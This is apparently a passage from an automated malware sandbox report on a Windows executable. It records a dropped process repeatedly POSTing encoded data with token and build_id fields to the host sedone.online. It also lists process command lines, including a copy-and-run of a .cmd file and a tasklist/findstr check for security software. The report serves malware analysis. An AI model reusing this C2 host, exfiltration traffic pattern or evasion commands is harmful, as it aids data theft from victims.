                                                                                                                                                                                                                                                                2024-12-16 12:47:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:42 UTC11904OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:43 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                48192.168.2.849869116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:51 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 32481
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------V3WLNGD26F3EU3W4O8GVCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:51 UTC16126OUTData Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:52 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                49192.168.2.849870116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:52 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 4421
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:52 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------7YCBIE37YCBAIEC26FCBCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:53 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                50192.168.2.849871116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:54 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0ZUSR1VAI58QQI5XT2DJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 2449
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:54 UTC2449OUTData Raw: 2d 2d 2d 2d 2d 2d 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------0ZUSR1VAI58QQI5XT2DJContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------0ZUSR1VAI58QQI5XT2DJContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------0ZUSR1VAI58QQI5XT2DJCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:55 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                51192.168.2.849872116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:55 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Y58GDTJM7GVAAAIE3WBA
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 6533
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:55 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------Y58GDTJM7GVAAAIE3WBAContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------Y58GDTJM7GVAAAIE3WBAContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------Y58GDTJM7GVAAAIE3WBACont
                                                                                                                                                                                                                                                                2024-12-16 12:47:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:56 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                52192.168.2.849873116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:57 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BIM7Y5P8Q9RIMYC2D2DJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 3269
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:57 UTC3269OUTData Raw: 2d 2d 2d 2d 2d 2d 42 49 4d 37 59 35 50 38 51 39 52 49 4d 59 43 32 44 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 42 49 4d 37 59 35 50 38 51 39 52 49 4d 59 43 32 44 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 42 49 4d 37 59 35 50 38 51 39 52 49 4d 59 43 32 44 32 44 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------BIM7Y5P8Q9RIMYC2D2DJContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------BIM7Y5P8Q9RIMYC2D2DJContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------BIM7Y5P8Q9RIMYC2D2DJCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:58 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                53192.168.2.849874116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:58 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----00HDTR9ZC2VAAIE3O8YC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 11445
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:58 UTC11445OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 48 44 54 52 39 5a 43 32 56 41 41 49 45 33 4f 38 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 44 54 52 39 5a 43 32 56 41 41 49 45 33 4f 38 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 30 30 48 44 54 52 39 5a 43 32 56 41 41 49 45 33 4f 38 59 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------00HDTR9ZC2VAAIE3O8YCContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------00HDTR9ZC2VAAIE3O8YCContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------00HDTR9ZC2VAAIE3O8YCCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:59 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:07:45:52
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\nB52P46OJD.exe"
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                File size:1'357'367 bytes
                                                                                                                                                                                                                                                                MD5 hash:C6E90B3A98ECB4AB74A9AAF8155D1BC0
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                Start time:07:45:53
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
                                                                                                                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                Start time:07:45:53
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                Start time:07:45:56
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                                                Imagebase:0x5d0000
                                                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                Start time:07:45:56
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                Start time:07:45:56
                                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                                                Imagebase:0x5d0000
                                                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
